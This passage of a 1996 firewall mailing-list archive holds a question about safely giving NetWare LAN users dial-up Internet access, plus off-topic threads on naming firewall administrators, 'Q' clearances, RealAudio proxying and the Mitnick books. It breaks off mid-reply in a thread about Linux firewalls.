Let me provide some background on our network's configuration. We have a Novell NetWare 4.10 server. The majority of our users have PCs (running Windows 3.1), but we do have a few Macs and Unix boxes. We run IPX, Appletalk, and IP internally. Only the PCs and Macs will be accessing the Internet, and they will be running Netscape Navigator for Web browsing and e-mail.

I see three possible "easy" solutions for temporary Internet connectivity.

1) Give them access through a modem pool on the network, using a PC running NetWare Connect. This one is probably risky as there will be packets from the Internet actually entering the LAN. If we set up a device to filter all packets except those that are needed for HTTP and SMTP, again, what can an attacker do to the PC running Netscape Navigator and/or to other systems on our network -- especially the Unix boxes? (Although the most dangerous, this would actually be the preferred solution -- security allowing -- because we can use mechanisms already in place to implement it.)

2) Attach local modems to certain computers. Assuming that the TCP/IP stack will not route between the serial and network interfaces, and assuming that the users will only run Netscape, what is the potential damage that an attacker could do to a user's system and/or to other systems on our network?

3) Set up some non-networked PCs with modems at various locations within the company.

Either of the first two options is preferred due to the convenience of being able to work from one's desk. Security, however, is more important than convenience.

Also, would going through an information service such as CIS or AOL, instead of a dedicated ISP, make these connections any more/less secure? Would running TIA on a shell account make no difference/increase/reduce the risk?

Are there any better solutions that I have overlooked?

Thank you for taking time to answer these questions!
Robert Zamora

From firewalls-owner Mon Jan 15 06:55:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA06547 for firewalls-outgoing; Mon, 15 Jan 1996 06:45:42 -0800 (PST)
Received: from tiete.dcc.unicamp.br (dcc.unicamp.br [143.106.1.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA06493 for ; Mon, 15 Jan 1996 06:44:38 -0800 (PST)
Received: from grande.unicamp.br (grande.dcc.unicamp.br) by tiete.dcc.unicamp.br (4.1/SMI-4.1) id AA18967; Mon, 15 Jan 96 12:46:10 EDT
Received: from jaguari by grande.unicamp.br (SMI-8.6/SMI-SVR4) id MAA01307; Mon, 15 Jan 1996 12:45:48 -0200
Received: by jaguari (5.x/SMI-SVR4) id AA15644; Mon, 15 Jan 1996 12:45:57 -0200
Date: Mon, 15 Jan 1996 12:45:57 -0200
Message-Id: <9601151445.AA15644@jaguari>
From: Paulo Licio de Geus
To: Firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?
In-Reply-To: <9601121933.AA26551@margit>
References: <9601121905.AA43800@melupl.melita.com> <9601121933.AA26551@margit>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Dave Kennedy wrote on 12-Jan-96 at 14:05:12 -0500, in part:
>
>> The mail administrator is "postmaster"
>
>> The web server admin is "webmaster"
>
>> Is there such a title for a firewall administrator?

I think defining a well-known alias is going to be useful to users, so I'm posting yet another msg on that subject. In keeping in line with the other well-known aliases, with the suffix "master", good suggestions might be, in order of relationship to the real world:

gatemaster (as opposed to gatekeeper)
netmaster
doormaster

packetmaster is unnecessarily too technical...

MHO, only.
--
postmaster/manager Paulo Licio de Geus   INTERNET: paulo@dcc.unicamp.br
Depto de Ciencia da Computacao           voice: +55 192 39-3115/8695/8442
DCC - IMECC - UNICAMP                    fax: +55 192 39-7470/5808
caixa postal: 6065                       13081-970 Campinas SP Brazil

From firewalls-owner Mon Jan 15 07:10:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA06657 for firewalls-outgoing; Mon, 15 Jan 1996 06:47:32 -0800 (PST)
Received: from softserv.tcst.com (softserv.spectrum.titan.com [199.1.156.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA06642 for ; Mon, 15 Jan 1996 06:47:22 -0800 (PST)
Received: (from tighe@localhost) by softserv.tcst.com (8.6.12/8.6.12) id IAA03168; Mon, 15 Jan 1996 08:46:08 -0600
From: Mike Tighe
Message-Id: <199601151446.IAA03168@softserv.tcst.com>
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura
To: del@giant.IntraNet.com (G. Del Merritt)
Date: Mon, 15 Jan 1996 08:46:08 -0600 (CST)
Cc: Firewalls@GreatCircle.COM
Reply-To: tighe@spectrum.titan.com
In-Reply-To: <0099C465F6823600.4060064A@giant.IntraNet.com> from "G. Del Merritt" at Jan 12, 96 11:02:44 am
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

G. Del Merritt writes:

>One of the points of SCI is that it is based on need to know. If you don't
>need to know about "Q", then you won't necessarily even know that it exists.
>And this is what you are told in the briefing process.

Q is not SAO/SCI; it is a clearance level. If you apply for a job at one of the labs, they will tell you you will need a Q. It is hardly need to know.
From firewalls-owner Mon Jan 15 07:48:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA07115 for firewalls-outgoing; Mon, 15 Jan 1996 06:59:42 -0800 (PST)
Received: from access1.digex.net (access1.digex.net [205.197.245.192]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA07104 for ; Mon, 15 Jan 1996 06:59:38 -0800 (PST)
Received: (from curt@localhost) by access1.digex.net (8.6.12/8.6.12) id JAA10397 ; for ; Mon, 15 Jan 1996 09:57:12 -0500
Date: Mon, 15 Jan 1996 09:57:10 -0500 (EST)
From: curt williams
To: "A. Padgett Peterson, P.E. Information Security"
cc: firewalls@GreatCircle.COM
Subject: re: "Q" Clearance
In-Reply-To: <960112133907.20203704@hobbes.orl.mmc.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

yes, but wasn't "Crypto" really spelled "Krypto"?

On Fri, 12 Jan 1996, A. Padgett Peterson, P.E. Information Security wrote:

> > I hold a TS SCI clearance with the Air Force. I've been in for almost 10
> > years, and I've never heard of a "Q" clearance.
>
> Ten years ago is too recent. Back in the days of free trips to SouthEastAsia
> there were several compartmented levels above Top Secret such as "R"
> and "Crypto" that usually required EBIs. "Q" referred to certain "special
> weapons" that I will not go into further. Does Brain21's father glow in the
> dark ?
> Warmly,
> Padgett
>

From firewalls-owner Mon Jan 15 07:55:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA08320 for firewalls-outgoing; Mon, 15 Jan 1996 07:35:38 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA08315 for ; Mon, 15 Jan 1996 07:35:33 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id HAA20429; Mon, 15 Jan 1996 07:32:31 -0800
Received: from mms.mms.de(193.103.159.2) by mycroft via smap (V1.3mjr) id sma020427; Mon Jan 15 07:31:38 1996
Message-Id:
Comments: Authenticated sender is
From: "Frank Heinzius"
To: "Jay R. Clark"
Date: Mon, 15 Jan 1996 16:34:32 +0000
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: RE: "Title for Firewall Admin?
Reply-to: frimp@mms.de
CC: firewalls@GreatCircle.COM
X-mailer: Pegasus Mail for Windows (v2.22)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 14 Jan 96 at 15:30, Jay R. Clark wrote:

> [...]
>
> Given managements proclivity to often confuse the message with the
> messenger, how 'bout "roadkill" as in on the information superhighway

what about "hitcher, the highway killer"?

--
***** The expressed opinions are totally mine! *****
Frank M. Heinzius            MMS Communication GmbH
frimp@mms.de                 Eiffestrasse 598
http://www.mms.de            Germany
Phone: +49 40 211105-0       Fax  : +49 40 210 32 210
***** U.S.Robotics and Livingston Distributor *****

From firewalls-owner Mon Jan 15 08:41:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA08646 for firewalls-outgoing; Mon, 15 Jan 1996 07:42:55 -0800 (PST)
Received: from vulcan.iss.bnr.com (vulcan.iss.bnr.com [139.51.128.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA08634 for ; Mon, 15 Jan 1996 07:42:47 -0800 (PST)
From: Mark_W_Loveless@smtp.bnr.com
Received: from smtp.bnr.com by vulcan.iss.bnr.com (4.1/BNR/v1.0/910819) id AA26129; Mon, 15 Jan 96 09:41:32 CST
Received: from cc:Mail by smtp.bnr.com id AA821727627; Mon, 15 Jan 96 08:30:46 CST
Date: Mon, 15 Jan 96 08:30:46 CST
Message-Id: <9600158217.AA821727627@smtp.bnr.com>
To: firewalls@greatcircle.com
Subject: The Last Mitnick Post/Thread
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Most everyone is speculating on things we know nothing about. I can only assume hackers hope we spend all our time talking about them and not looking for them on our systems.

The definitive book on Mitnick is The Fugitive Game by Jonathan Littman. A lot of it is Mitnick's own words. Well written, much better than Markoff's "hype"rspace writings. Please read this instead of posting unauthenticated "facts" about people most of us have never met or spoken to, let alone saw exactly how they configured everything they were responsible for.

Instead, why not discuss the questions it raised -- do we allow lax security on occasion for our own convenience? Do we allow lax security because we "have" to meet some goofy upper management need? How do you justify these acts? Or more importantly, when someone has to have that special need, you give it to them and get burned, what did you do?
Blatant attempt to get back on topic,

Mark_W_Loveless@smtp.bnr.com

From firewalls-owner Mon Jan 15 09:21:41 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA11385 for firewalls-outgoing; Mon, 15 Jan 1996 08:38:28 -0800 (PST)
Received: from shuksan.dnac.com ([192.220.236.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA11380 for ; Mon, 15 Jan 1996 08:38:24 -0800 (PST)
Received: from Tatonka.dnac.com (192.220.236.157) by shuksan.dnac.com (EMWAC SMTPRS 0.50) with SMTP id ; Mon, 15 Jan 1996 08:37:28 -0800
Message-ID: <30FA8215.60F4@dnac.com>
Date: Mon, 15 Jan 1996 08:34:29 -0800
From: "D. Worthington"
Organization: Digital Network Architects
X-Mailer: Mozilla 2.0b3 (Win95; I)
MIME-Version: 1.0
To: "A. Padgett Peterson, P.E. Information Security"
CC: firewalls@greatcircle.com
Subject: Re: "Q" Clearance
References: <960112133907.20203704@hobbes.orl.mmc.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

A. Padgett Peterson, P.E. Information Security wrote:
>
> > I hold a TS SCI clearance with the Air Force. I've been in for almost 10
> > years, and I've never heard of a "Q" clearance.
>
> Ten years ago is too recent. Back in the days of free trips to SouthEastAsia
> there were several compartmented levels above Top Secret such as "R"
> and "Crypto" that usually required EBIs. "Q" referred to certain "special
> weapons" that I will not go into further. Does Brain21's father glow in the
> dark ?
> Warmly,
> Padgett

During Vietnam, I was assigned to the Army Security Agency (ASA), the military branch of the NSA. This is the way it laid out at that time.

There *were* four, and *only* four, levels of security, ranging from FOUO (For Official Use Only) to Confidential, Secret, and Top Secret. Any bona fide citizen of the United States has a "right" to a security clearance, including a top secret security clearance.

"Access" to security information, however, was considered a "privilege." It is this "privilege" that is actually controlled by the government and its representative agencies. Access is granted, basically, on a "need to know" basis, and it is "levels of access," that are administered by these different designations, "crypto," et al. The access designations act like a certification of "need to know," and tend to ease the process of constant checking on the level of access privilege granted to any individual.

BTW, I've seen some traffic lately on "classified trash." As someone who has spent many hours in charge of "burn detail," let me assure everyone of two things. First, all classified trash is handled as though it were classified top secret, regardless of its potential "real" classification. Second, all trash created in a secure area is considered classified, regardless of what it "really" is.

regards,
Don Worthington

From firewalls-owner Mon Jan 15 09:25:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA13081 for firewalls-outgoing; Mon, 15 Jan 1996 09:14:11 -0800 (PST)
Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA13076 for ; Mon, 15 Jan 1996 09:14:08 -0800 (PST)
Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id MAA29510; Mon, 15 Jan 1996 12:12:10 -0500
Date: Mon, 15 Jan 1996 12:12:10 -0500 (EST)
From: Brain21
To: Ken Hardy
cc: cjwoods@wire.paladin.com, firewalls@GreatCircle.COM
Subject: Re: UDP and the unclean...
In-Reply-To: <199601111522.AA00773@ignatz.bridge.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 11 Jan 1996, Ken Hardy wrote:

> used for control purposes.
> Does anyone know whether information
> concerning the source and/or destination UDP port to be used are first
> conveyed over the TCP connection? If so it might be possible, given
> protocol details, to write an intelligent proxy that would only allow
> "legitimate" realaudio packets through.
>
> (Don't you love proprietary protocols?)
>

I would like to know if anyone knows if there is an "RFC," perhaps distributed w/ RealAudio, or otherwise obtainable that describes the protocol used (kinda like ssh has its own, unofficial "RFC" included in the distribution)? Or the same for StreamWorks or VDOLive?

Any hints?

Brain21

From firewalls-owner Mon Jan 15 09:40:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA13342 for firewalls-outgoing; Mon, 15 Jan 1996 09:25:47 -0800 (PST)
Received: from Aptech.com (joshua.aptech.com [199.29.185.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA13335 for ; Mon, 15 Jan 1996 09:25:42 -0800 (PST)
Received: by Aptech.com (SMI-8.6/SMI-SVR4) id JAA06392; Mon, 15 Jan 1996 09:22:53 -0800
Received: from naomi(199.29.185.132) by joshua via smap (V1.3) id sma006390; Mon Jan 15 09:22:24 1996
Received: from amos.Aptech.com by naomi.Aptech.com (SMI-8.6/SMI-SVR4) id JAA04107; Mon, 15 Jan 1996 09:23:10 -0800
Received: by amos.Aptech.com (SMI-8.6/SMI-SVR4) id JAA13566; Mon, 15 Jan 1996 09:23:04 -0800
Date: Mon, 15 Jan 1996 09:23:04 -0800
From: sjones@Aptech.com (Samuel D. Jones)
Message-Id: <199601151723.JAA13566@amos.Aptech.com>
To: Firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Net Watchman

From firewalls-owner Mon Jan 15 10:18:31 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA13495 for firewalls-outgoing; Mon, 15 Jan 1996 09:33:37 -0800 (PST)
Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA13490 for ; Mon, 15 Jan 1996 09:33:33 -0800 (PST)
Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id MAA29540; Mon, 15 Jan 1996 12:31:31 -0500
Date: Mon, 15 Jan 1996 12:31:30 -0500 (EST)
From: Brain21
To: Frederick M Avolio
cc: Bill Curr , firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?
In-Reply-To: <2.2.16.19960112143121.3f9720e2@gauntlet-1.trusted.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jan 1996, Frederick M Avolio wrote:

>
> "gatekeeper" is a fun possibility. "doorman" is too plain.
>

What about "Gozer (sp), the Key Master?"
Brain21

From firewalls-owner Mon Jan 15 10:27:10 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA14191 for firewalls-outgoing; Mon, 15 Jan 1996 09:53:49 -0800 (PST)
Received: from inet1.tek.com (inet1.tek.com [134.62.48.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA14186 for ; Mon, 15 Jan 1996 09:53:45 -0800 (PST)
Received: by inet1.tek.com id ; Mon, 15 Jan 1996 09:52:49 -0800
Received: from tektronix.tek.com(134.62.48.24) by inet1 via smap (V1.3) id sma022208; Mon Jan 15 09:44:56 1996
Received: from orca.wv.tek.com by tektronix.TEK.COM (4.1/8.2) id AA11782; Mon, 15 Jan 96 07:32:00 PST
Received: from trouble.WV.TEK.COM by orca.wv.tek.com (4.1/8.2) id AA03335; Mon, 15 Jan 96 07:33:30 PST
Received: by trouble.WV.TEK.COM (4.1/8.0) id AA06314; Mon, 15 Jan 96 07:31:16 PST
Date: Mon, 15 Jan 1996 07:31:14 -0800 (PST)
From: Kent Dahlgren
To: "A. Padgett Peterson, P.E. Information Security"
Cc: firewalls@greatcircle.COM
Subject: re: "Q" Clearance
In-Reply-To: <960112133907.20203704@hobbes.orl.mmc.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jan 1996, A. Padgett Peterson, P.E. Information Security wrote:

> > I hold a TS SCI clearance with the Air Force. I've been in for almost 10
> > years, and I've never heard of a "Q" clearance.
>
> Ten years ago is too recent. Back in the days of free trips to SouthEastAsia
> there were several compartmented levels above Top Secret such as "R"
> and "Crypto" that usually required EBIs. "Q" referred to certain "special
> weapons" that I will not go into further. Does Brain21's father glow in the
> dark ?
> Warmly,

Every day since I made the mistake of replying in haste I have kicked myself for being such an idiot. I was so wrong to ever start such a discussion on these subjects in this arena I can't even believe it.

I stand guilty of immaturity, and long for the day when I come to work, log in, and don't have to see my name connected to any more DOD security clearances discussions....on the Internet!

Although the flames were stinging, I appreciate their intent.

Kent.

______________________________________________________________________________
______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______
  Voice: 1.800.835.6100            E-mail: support@colorprinters.tek.com
  Fax: 1.503.685.3063              WWW: www.tek.com
  BBS: 1.503.685.4504              E-World: Keyword Tektronix
  HAL: 1.503.682.7450              AOL: Keyword Tektronix
  Service: 1.800.835.6100          FTP: ftp.tek.com
______________________________________________________________________________

From firewalls-owner Mon Jan 15 10:40:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA14829 for firewalls-outgoing; Mon, 15 Jan 1996 10:03:32 -0800 (PST)
Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA14824 for ; Mon, 15 Jan 1996 10:03:29 -0800 (PST)
Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id NAA29638; Mon, 15 Jan 1996 13:01:31 -0500
Date: Mon, 15 Jan 1996 13:01:31 -0500 (EST)
From: Brain21
To: Ken Hays
cc: Dave Kennedy , Shawn Steele , Firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?
In-Reply-To: <9601121933.AA26551@margit>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jan 1996, Ken Hays wrote:

> >Remember "Ghostbusters?" There was the gatekeeper and the keymaster.
>
> I would suggest that keymaster be reserved for the Kerberos administrator.
>

I think Gozer was the keymaster, does anyone remember the Gatekeepers name?
Brain21 From firewalls-owner Mon Jan 15 11:04:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA18169 for firewalls-outgoing; Mon, 15 Jan 1996 10:49:22 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA18164 for ; Mon, 15 Jan 1996 10:49:17 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id NAA29745; Mon, 15 Jan 1996 13:47:13 -0500 Date: Mon, 15 Jan 1996 13:47:13 -0500 (EST) From: Brain21 To: "A. Padgett Peterson, P.E. Information Security" cc: firewalls@GreatCircle.COM Subject: re: "Q" Clearance In-Reply-To: <960112133907.20203704@hobbes.orl.mmc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, A. Padgett Peterson, P.E. Information Security wrote: > and "Crypto" that usually required EBIs. "Q" referred to certain "special > weapons" that I will not go into further. Does Brain21's father glow in the > dark ? I guess you'd have to ask my mom. :) Brain21 From firewalls-owner Mon Jan 15 11:18:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA15602 for firewalls-outgoing; Mon, 15 Jan 1996 10:14:17 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA15593 for ; Mon, 15 Jan 1996 10:14:12 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id NAA29675; Mon, 15 Jan 1996 13:12:09 -0500 Date: Mon, 15 Jan 1996 13:12:09 -0500 (EST) From: Brain21 To: "G. 
Del Merritt" cc: Firewalls@GreatCircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura In-Reply-To: <0099C465F6823600.4060064A@giant.IntraNet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, G. Del Merritt wrote: > need to know about "Q", then you won't necessarily even know that it exists. > And this is what you are told in the briefing process. > > So Cool. Now the world knows more about you all. This shows quite well that > firewalls cannot contain sensitive information; only people can. Firewalls > can at best just impede the flow. > > A story, perhaps legend, passed on to me by my security officer when I was > still a part of the MIC: > Fellow who has long been waiting for his clearance walks into the local bar, > sees his buddies, and hollers, "I'm SECRET, I'm SECRET!". Next day he wasn't. OK, combine the above, with another posters commentary on someone inadvertantly saying something about "snow tires" over some line of communication that s/he shouldn't have, and you get at what I was trying to point out (or at least part of it) in my post. The point is that the possibility is there, and that (I think) the government should be resonsible for educating their sub-contractors who may not have security officeers, or have ones athat are not FULLY aware of the government's regulations regarding this topic. The sub-contractor that my dad used to work for was obviously NOT, or he would not have asked me just how secure internet email was. My father did NOTHING that would even insinuate that there is ANYTHING to arrest him for (sheesh! Some people need everthing spelled out explicitly, I think), but he was NOT educated either by his company OR the government as to these issues. I really don't think anyone said anything to him other than a passing "don't send this stuff out over the net. 
The net is for administrative email between offices, like arranging business trips, etc. and asking for fax requests," *IF* they even said that much.

To me, this situation represents dangerous possibilities for the exact reason illustrated by the above quote (Del Merritt's quote).

Thanks for everyone's 'understanding' (yeah....),

Brain21

From firewalls-owner Mon Jan 15 11:40:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA19923 for firewalls-outgoing; Mon, 15 Jan 1996 11:33:21 -0800 (PST)
Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA19911 for ; Mon, 15 Jan 1996 11:33:16 -0800 (PST)
Received: from reynaldo.parc.xerox.com ([13.2.116.96]) by alpha.xerox.com with SMTP id <15864(1)>; Mon, 15 Jan 1996 11:32:17 PST
Received: from localhost ([127.0.0.1]) by reynaldo.parc.xerox.com with SMTP id <34953>; Mon, 15 Jan 1996 11:31:14 -0800
X-Mailer: exmh version 1.6.4 10/10/95
To: Brain21
cc: Berry Kercheval, firewalls@greatcircle.com, kerch@parc.xerox.com
Subject: Re: "Q" Clearance
In-reply-to: Your message of "Mon, 15 Jan 1996 11:13:09 PST."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 15 Jan 1996 11:31:08 PST
From: Berry Kercheval
Message-Id: <96Jan15.113114pst.34953@reynaldo.parc.xerox.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>>>Brain21 said:
> On Sat, 13 Jan 1996, Berry Kercheval wrote:
> These people told him that his
> "Q" clearance simply was not good enough for the work that he was going
> to be doing, and he had to wait for clearance before he knew if he got
> the job

It's not uncommon. It's more often that your Frobozz clearance cannot be used for Xyzzy work, more because it's *different* than that it's "not good enough". My DoD Top Secret clearance went through much quicker because I already had a DoE clearance -- they could share files or something.

> important one). I say it is odd, because prior to his changing jobs I
> had only heard of DoD terms, and I *had* heard of "Q" clearance.

Well, Peter Benchley (Mr. "Jaws") wrote a perfectly dreadful novel called "Q Clearance" in which he got nearly every fact about Q clearances, DoE, DoD and classified work in general wrong. (To his credit, the DoD Headquarters *ARE* in a 5-sided building in Arlington, and the DoE HQ *IS* in DC proper...)

> Is
> there not, perhaps, something in the DoD that is similar in
> pronunciation?

Not one that *I* know of. Of course, *I* don't have a need-to-know :-)

> > The DoD controls all the military in the US. The DoE controls research,
> Well, these two, and other agencies *do* have duties that overlap, but
> that goes w/o saying.

Of course. I didn't want to go beyond the one-sentence summary on a topic that was already too far from Firewalls...

--berry

Berry Kercheval :: kerch@parc.xerox.com :: Xerox Palo Alto Research Center

From firewalls-owner Mon Jan 15 11:55:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA14291 for firewalls-outgoing; Mon, 15 Jan 1996 09:55:08 -0800 (PST)
Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA14276 for ; Mon, 15 Jan 1996 09:54:59 -0800 (PST)
Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id MAA29615; Mon, 15 Jan 1996 12:53:01 -0500
Date: Mon, 15 Jan 1996 12:53:01 -0500 (EST)
From: Brain21
To: Shawn Steele
cc: Firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?
In-Reply-To: <9601121030.ZM24307@aob.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jan 1996, Shawn Steele wrote:

> > The mail administrator is "postmaster"
> > The web server admin is "webmaster"
> > Is there such a title for a firewall administrator?
> > Firemaster?
> How about Firemarshall-Bill?

Or just plain Firemarshall?

Brain21

From firewalls-owner Mon Jan 15 12:10:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA14233 for firewalls-outgoing; Mon, 15 Jan 1996 09:54:39 -0800 (PST)
Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA14207 for ; Mon, 15 Jan 1996 09:54:28 -0800 (PST)
Received: by Disclosure.COM (4.1/SMI-4.1) id AA20780; Mon, 15 Jan 96 12:57:09 EST
Date: Mon, 15 Jan 1996 12:57:07 -0500 (EST)
From: Scott Barman
To: Mark_W_Loveless@smtp.bnr.com
Cc: firewalls@greatcircle.com
Subject: Re: The Last Mitnick Post/Thread
In-Reply-To: <9600158217.AA821727627@smtp.bnr.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 15 Jan 1996 Mark_W_Loveless@smtp.bnr.com wrote:

> Most everyone is speculating on things we know nothing about. I can
> only assume hackers hope we spend all our time talking about them and
> not looking for them on our systems.
>
> The definitive book on Mitnick is The Fugitive Game by Jonathan
> Littman. A lot of it is Mitnick's own words. Well written, much better
> than Markoff's "hype"rspace writings.

Dateline (on NBC) had a report of Shimomura's side of the story last Friday. I don't know if they put anything about it on their web site but you can try www.nbc.com. One of the reasons for this was to hype the book by Shimomura and the writer of the New York Times articles that followed.

Please don't ask me about the book (I can't even remember the title). All I remember were the authors and that it was released last week.

scott barman
--
scott barman             DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com     and I speak only for myself.
barman@ix.netcom.com
"Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming."
                                                   - scott barman

From firewalls-owner Mon Jan 15 12:17:35 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA14245 for firewalls-outgoing; Mon, 15 Jan 1996 09:54:44 -0800 (PST)
Received: from inet1.tek.com (inet1.tek.com [134.62.48.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA14227 for ; Mon, 15 Jan 1996 09:54:33 -0800 (PST)
Received: by inet1.tek.com id ; Mon, 15 Jan 1996 09:53:38 -0800
Received: from tektronix.tek.com(134.62.48.24) by inet1 via smap (V1.3) id sma015097; Mon Jan 15 09:46:29 1996
Received: from orca.wv.tek.com by tektronix.TEK.COM (4.1/8.2) id AA09933; Mon, 15 Jan 96 06:53:07 PST
Received: from trouble.WV.TEK.COM by orca.wv.tek.com (4.1/8.2) id AA02817; Mon, 15 Jan 96 06:54:36 PST
Received: by trouble.WV.TEK.COM (4.1/8.0) id AA06293; Mon, 15 Jan 96 06:52:21 PST
Date: Mon, 15 Jan 1996 06:52:18 -0800 (PST)
From: Kent Dahlgren
To: Dana Brewer
Cc: firewalls@greatcircle.COM
Subject: Re: Linux as a firewall
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jan 1996, Dana Brewer wrote:

> I've noticed that a lot of people say they use Linux as part of their
> Internet firewall. But now I've had a company tell me that Linux isn't a
